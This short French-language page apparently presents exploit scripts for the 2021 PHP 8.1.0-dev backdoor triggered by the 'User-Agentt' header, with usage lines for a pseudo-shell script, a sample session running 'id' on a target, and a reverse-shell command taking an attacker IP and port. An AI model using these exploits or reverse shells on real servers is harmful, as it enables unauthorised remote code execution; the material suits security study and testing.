
PHP 8.1.0-dev Backdoor System Shell Script
PHP 8.1.0-dev Backdoor System Shell Script

La version 8.1.0-dev de PHP a été publiée avec une backdoor le 28 mars 2021, mais la backdoor a été rapidement découverte et supprimée. Si cette version de PHP est exécutée sur un serveur, un attaquant peut exécuter du code arbitraire en envoyant l’en-tête User-Agentt.
Le code d'origine a été restauré après la découverte du problème, mais il a ensuite été altéré une seconde fois. La faille aurait créé une backdoor dans tout site Web exécutant la version compromise de PHP, permettant aux pirates d'exécuter du code à distance sur le site.
Lire l'article complet : https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Ce court script d'exploitation backdoor_php_8.1.0-dev.py utilise la backdoor pour fournir un pseudo shell système sur l'hôte. Retrouvez-le sur Exploit DB.
Utilisation :
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:
http://a.b.c.d
Interactive shell is opened on http://a.b.c.d
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
Ce court script d'exploitation revshell_php_8.1.0-dev.py fournit un reverse shell sur la cible.
Utilisation :
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

Soyez curieux, apprendre, c'est la vie ! 😃